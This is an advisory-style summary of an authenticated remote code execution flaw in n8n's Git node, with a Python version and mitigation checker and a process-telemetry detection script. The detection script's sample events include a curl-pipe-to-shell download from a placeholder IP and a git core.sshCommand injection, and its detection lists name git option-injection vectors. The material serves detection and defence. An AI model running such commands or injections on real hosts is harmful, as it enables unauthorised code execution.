Full Report
Open-source workflow automation platform n8n has warned of a maximum-severity security flaw that, if successfully exploited, could result in authenticated remote code execution (RCE). The vulnerability, which has been assigned the CVE identifier CVE-2026-21877, is rated 10.0 on the CVSS scoring system. "Under certain conditions, an authenticated user may be able to cause untrusted code to be
Analysis Summary
# Vulnerability: Authenticated Remote Code Execution in n8n Workflow Platform
## CVE Details
- CVE ID: CVE-2026-21877
- CVSS Score: 10.0 (Critical)
- CWE: Not stated on the page. The description (an authenticated user causing untrusted code to run on the host) points to a code-injection/code-execution weakness, but no CWE has been assigned here.
## Affected Systems
- Products: n8n (Open-source workflow automation platform)
- Versions: Versions greater than or equal to 0.123.0 and less than 1.121.3
- Configurations: Affects both self-hosted and cloud versions. Requires user authentication.
## Vulnerability Description
A maximum-severity vulnerability exists where an authenticated user can, under certain conditions, cause untrusted code to be executed on the n8n host. Successful exploitation results in Remote Code Execution (RCE) in the context of the n8n process. The vendor's recommended workaround (disable the Git node) indicates that the flaw is reached through the Git node; the page does not describe the exact trigger.
## Exploitation
- Status: Not stated whether the flaw has been exploited in the wild or whether a public proof of concept exists. A CVSS score of 10.0 describes impact and exploitability metrics, not whether an exploit is circulating.
- Complexity: Not stated; the CVSS vector is not given on the page. The only stated precondition is an authenticated account, so until patched, every account that can log in and build workflows should be treated as able to reach the flaw.
- Attack Vector: Network, through the authenticated n8n web UI or API. Self-hosted instances that admit untrusted or low-privilege users are the primary concern.
## Impact
- Confidentiality: High (Potential for data exposure via RCE)
- Integrity: High (Unauthorized code execution allows modification/destruction of data)
- Availability: High (Potential for system compromise or denial of service)
## Remediation
### Patches
- Upgrade n8n to version **1.121.3** or later. (This version was released in November 2025).
### Workarounds
1. **Disable the Git node** immediately if patching is not possible. n8n's hosting documentation describes blocking built-in nodes through the `NODES_EXCLUDE` environment variable (reference: https://docs.n8n.io/hosting/securing/blocking-nodes/). This is a temporary mitigation; the upgrade is still required.
2. **Limit access** so that only trusted users can authenticate to the platform and author workflows.
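To turn the affected version range and the two mitigation options above into something that can be run against an instance inventory, here is an added Python example (not n8n's own code and not from the advisory). It assumes n8n version strings follow SemVer, that `NODES_EXCLUDE` takes a JSON array of node type names as the n8n docs describe, and that the built-in Git node's type name is `n8n-nodes-base.git`, an assumption drawn from n8n's `n8n-nodes-base.<name>` naming convention that should be confirmed against your own instance's node list.

```python
import json
import re

# Affected range as stated in the advisory summary: >= 0.123.0 and < 1.121.3.
# The trailing element encodes "pre-release (0) vs final release (1)", see parse_version().
AFFECTED_MIN = (0, 123, 0, 0)
FIXED = (1, 121, 3, 1)

# Type name of the built-in Git node for NODES_EXCLUDE. Assumption based on n8n's
# "n8n-nodes-base.<name>" convention; confirm it against your instance's node list.
GIT_NODE_TYPE = "n8n-nodes-base.git"


def parse_version(version):
    """Turn '1.121.3', 'v1.121.3' or '1.121.3-rc.1' into a comparable tuple.

    SemVer orders a pre-release (1.121.3-rc.1) before the final 1.121.3, so a
    release candidate of the fix version must still count as unfixed. That is
    represented by a trailing 0 (pre-release) or 1 (final release).
    """
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?", version.strip())
    if not m:
        raise ValueError(f"unrecognised n8n version string: {version!r}")
    major, minor, patch, prerelease, _build = m.groups()
    return (int(major), int(minor), int(patch), 0 if prerelease else 1)


def is_affected(version):
    """True if this n8n version falls inside the range the advisory lists as affected."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


def nodes_exclude_value(node_types):
    """Value for n8n's NODES_EXCLUDE environment variable: a JSON array of node type names."""
    return json.dumps(list(node_types))


def remediation_plan(version, can_upgrade):
    """Pick the action for one instance: nothing, upgrade, or block the Git node until the upgrade."""
    if not is_affected(version):
        return {"action": "none", "reason": f"n8n {version} is outside the affected range"}
    if can_upgrade:
        return {"action": "upgrade", "target": "1.121.3"}
    return {
        "action": "block-git-node",
        "env": {"NODES_EXCLUDE": nodes_exclude_value([GIT_NODE_TYPE])},
        "note": "temporary mitigation; the upgrade to 1.121.3 or later is still required",
    }


if __name__ == "__main__":
    # Constructed inventory for the demo, not real hosts.
    inventory = [("n8n-prod", "1.118.2", False), ("n8n-dev", "1.121.3", True), ("n8n-old", "0.120.0", True)]
    for host, version, can_upgrade in inventory:
        print(host, version, remediation_plan(version, can_upgrade))
```

In a docker-compose deployment the `NODES_EXCLUDE` value goes into the n8n service's `environment:` block, after which n8n must be restarted and the Git node checked to be no longer offered to workflow authors. Existing workflows that already contain the node should be reviewed as part of the same change.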
## Detection
- Detection: monitor process creation on the n8n host or container. The Git node only needs to spawn `git`, so an n8n process spawning a shell, a downloader or an interpreter is a strong signal on its own (unless the Execute Command node is legitimately in use), and `git` invocations that carry option or config injection (for example `-c core.sshCommand=...`, `--upload-pack=...`, or an `ext::` URL, which are generic git patterns for running another program rather than details of this CVE) should be alerted on. Separately, review n8n's workflow history for newly added or edited workflows that use the Git node, especially from accounts that did not use it before.
- Indicators of compromise are those of any successful RCE: unexpected outbound connections from the n8n host, new executable files in writable paths, and persistence or credential access attempted from the n8n process context.
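As an added example (not from the advisory and not n8n code), the following Python triages process-creation telemetry for the pattern described above. The event format and the sample lines are constructed for the example, and the git indicators are generic argument-injection checks for git (config keys and options that make git run another program), not details of how CVE-2026-21877 is triggered.

```python
import json
import os
import shlex

# Constructed process-creation events (not real telemetry), one JSON object per line,
# in the shape an EDR or auditd-to-JSON pipeline might emit. pid 1200 is the n8n process.
SAMPLE_EVENTS = """\
{"ts":"2025-11-20T10:01:02Z","ppid":1200,"parent_cmdline":"node /usr/local/bin/n8n start","pid":1301,"exe":"/usr/bin/git","cmdline":"git clone https://git.example.org/team/repo.git /data/repo"}
{"ts":"2025-11-20T10:02:15Z","ppid":1200,"parent_cmdline":"node /usr/local/bin/n8n start","pid":1302,"exe":"/usr/bin/git","cmdline":"git -c core.sshCommand=/tmp/.x.sh clone ssh://git.example.org/team/repo /data/repo"}
{"ts":"2025-11-20T10:03:40Z","ppid":1200,"parent_cmdline":"node /usr/local/bin/n8n start","pid":1303,"exe":"/bin/sh","cmdline":"sh -c curl http://198.51.100.7/x | sh"}
{"ts":"2025-11-20T10:04:00Z","ppid":1,"parent_cmdline":"/sbin/init","pid":1400,"exe":"/usr/bin/git","cmdline":"git -c core.sshCommand=ssh fetch origin"}
"""

# Generic git argument-injection indicators: config keys and options that make git
# execute an attacker-chosen program. General git heuristics, not CVE-2026-21877 specifics.
DANGEROUS_GIT_CONFIG = {"core.sshcommand", "core.gitproxy", "core.hookspath", "core.pager", "core.editor"}
DANGEROUS_GIT_FLAGS = ("--upload-pack", "--receive-pack", "--exec")


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_n8n_child(event):
    # In this constructed format the parent's command line identifies n8n; with real
    # telemetry key on the n8n process id or container id instead of a substring match.
    return "n8n" in event.get("parent_cmdline", "")


def git_injection_reason(argv):
    """Return a short reason if argv looks like git option/config injection, else None."""
    i = 1
    while i < len(argv):
        arg = argv[i]
        key = None
        if arg == "-c" and i + 1 < len(argv):      # git -c key=value
            key = argv[i + 1].split("=", 1)[0]
            i += 1
        elif arg.startswith("-c") and "=" in arg:  # git -ckey=value
            key = arg[2:].split("=", 1)[0]
        if key and key.lower() in DANGEROUS_GIT_CONFIG:
            return f"-c {key}"
        if arg.startswith(DANGEROUS_GIT_FLAGS):    # e.g. --upload-pack=/tmp/x
            return arg.split("=", 1)[0]
        if arg.startswith("ext::"):                # ext:: transport runs a local command
            return "ext:: transport"
        i += 1
    return None


def triage(events):
    """Return (pid, reason) for every suspicious child process of n8n."""
    findings = []
    for ev in events:
        if not is_n8n_child(ev):
            continue
        if os.path.basename(ev["exe"]) != "git":
            # The Git node only needs git itself. Unless the Execute Command node is
            # legitimately in use, a shell, curl or interpreter spawned by n8n is an alert.
            findings.append((ev["pid"], f"non-git child of n8n: {ev['cmdline']}"))
            continue
        reason = git_injection_reason(shlex.split(ev["cmdline"]))
        if reason:
            findings.append((ev["pid"], f"suspicious git invocation ({reason}): {ev['cmdline']}"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(parse_events(SAMPLE_EVENTS)):
        print(pid, reason)
```

The plain `git clone` from pid 1301 is left alone because legitimate Git node use looks exactly like that; the value of this check comes from baselining what the n8n process normally spawns and alerting on the departures, not from flagging every git execution.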
## References
- Vendor Advisory: not linked on the page; the affected range and the fix version (1.121.3) are taken from the vendor's disclosure as reported.
- Researcher Credit: Théo Lelasseux (@theolelasseux)
- Related Vulnerabilities Mentioned: CVE-2025-68613 (CVSS 9.9), CVE-2025-68668 (CVSS 9.9)